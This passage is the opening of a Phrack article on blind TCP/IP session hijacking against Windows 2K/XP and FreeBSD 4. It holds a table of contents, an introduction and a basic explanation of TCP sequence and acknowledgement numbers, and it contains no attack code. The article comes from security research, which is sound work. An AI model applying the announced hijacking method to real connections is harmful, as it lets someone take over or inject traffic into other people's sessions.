	* Kad and Mayhem, for convincing me to write this article

	* Sauron, for always motivating me (nothing sexual)

	* Glenux, for pointing out CUDA

	* All people present to scythale's aperos, for helping me to get
	high in such ways I can come up with evil thinking (yeah, I was
	drunk when I decided to backdoor my hardware)



           _                                                  _
          _/B\_                                              _/W\_
          (* *)              Phrack #64 file 13              (* *)
          | - |                                              | - |
          |   |      Blind TCP/IP hijacking is still alive   |   |
          |   |                                              |   |
          |   |            By lkm <>           |   |
          |   |                                              |   |
          |   |                                              |   |

--[ Contents

        1 - Introduction
        2 - Prerequisites
          2.1 - A brief reminder on TCP
          2.2 - The interest of IP ID
          2.3 - List of informations to gather

        3 - Attack description
          3.1 - Finding the client-port
          3.2 - Finding the server's SND.NEXT
          3.3 - Finding the client's SND.NEXT

        4 - Discussion
          4.1 - Vulnerable systems
          4.2 - Limitations

        5 - Conclusion

        6 - References

--[ 1 - Introduction

Fun with TCP (blind spoofing/hijacking, etc.) was very popular several
years ago, when the initial TCP sequence numbers (ISN) were guessable (64K
rule, etc.). Now that the ISNs are fairly well randomized, this stuff
seems to be dead.

In this paper we will show that it is still possible to perform blind TCP
hijacking nowadays (without attacking the PRNG responsible for generating 
the ISNs, like in [1]). We will present a method which works against a number 
of systems (Windows 2K, windows XP, and FreeBSD 4). This method is not really 
straightforward to implement, but is nonetheless entirely feasible, as we've
coded a tool which was successfully used to perform this attack against all
the vulnerable systems.

--[ 2 - Prerequisites

In this section we will give some information that is necessary to
understand this paper.

----[ 2.1 - A brief reminder on TCP 

A TCP connection between two hosts (which will be called respectively
"client" and "server" in the rest of this paper) can be identified by a
tuple [client-IP, server-IP, client-port, server-port]. While the server
port is well known, the client port is usually in the range 1024-5000 and
automatically assigned by the operating system. (Example: the connection
from some guy to freenode may be represented by [,, 1207, 6667].)

When communication occurs on a TCP connection, the exchanged TCP packet
headers contain this information (more precisely, the IP header contains
the source/destination IP, and the TCP header contains the
source/destination port). Each TCP packet header also contains fields for
a sequence number (SEQ) and an acknowledgement number (ACK).

Each of the two hosts involved in the connection computes a random 32-bit
SEQ number at the establishment of the connection. This initial SEQ
number is called the ISN. Then, each time a host sends a packet with
N bytes of data, it adds N to its SEQ number.
The sender puts its current SEQ in the SEQ field of each outgoing TCP
packet. The ACK field is filled with the next *expected* SEQ number from
the other host. Each host maintains its own next sequence number (called
SND.NEXT), and the next expected SEQ number from the other host (called
RCV.NEXT).
Let's clarify with an example (for the sake of simplicity, we consider
that the connection is already established, and the ports are not shown).

Client						Server

[SND.NEXT=1000]					[SND.NEXT=2000]
	  --[SEQ=1000, ACK=2000, size=20]->
[SND.NEXT=1020]					[SND.NEXT=2000]
	  <-[SEQ=2000, ACK=1020, size=50]--
[SND.NEXT=1020]					[SND.NEXT=2050]	
	  --[SEQ=1020, ACK=2050, size=0]->

In the above example, the client first sends 20 bytes of data. Then, the
server acknowledges this data (ACK=1020), and sends its own 50 bytes of
data in the same packet.